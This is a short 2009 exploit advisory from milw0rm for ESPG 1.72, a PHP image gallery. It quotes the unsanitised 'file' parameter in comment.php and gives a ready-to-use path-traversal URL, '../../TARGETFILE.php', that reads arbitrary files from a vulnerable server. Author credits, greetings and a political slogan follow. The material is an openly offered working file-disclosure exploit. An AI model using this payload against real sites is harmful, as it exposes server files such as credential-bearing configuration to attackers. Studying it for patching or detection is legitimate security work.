1
2 .::ESPG 1.72 File Disclosure Vulnerability::.
3
4
5
6 => Scriptname: ESPG (Enhanced Simple PHP Gallery) 1.72
7
8 => Vendor: http://quirm.net
9
10 => Download: http://quirm.net/download/21/
11
12 => Bugfounder: bd0rk
13
14 => Contact: bd0rk[at]hackermail.com
15
16 => Greetings: str0ke, TheJT, Maria, Alucard, x0r_32
17
18 => Vulnerable Code in comment.php line 3
19
20 −−−−−−−−−−−−−−−−−−−−−−−−−
21
22 $fileid = $_GET[’file’];
23
24 −−−−−−−−−−−−−−−−−−−−−−−−−
25
26
27
28 [+]Sploit: http://[t4rg3t]/gallery/comment.php?file=../../TARGETFILE.php
29
30
31 ###The 20 years old, german Hacker bd0rk###
32
33
34 => ’GAINST WAR IN ISRAEL AND GAZA!!! <=
35
36 # milw0rm.com [2009−01−18]
Page 1/1
ESPG Enhanced Simple PHP Gallery 1.72 File Disclosure Vulnerability
bd0rk
01/18/2009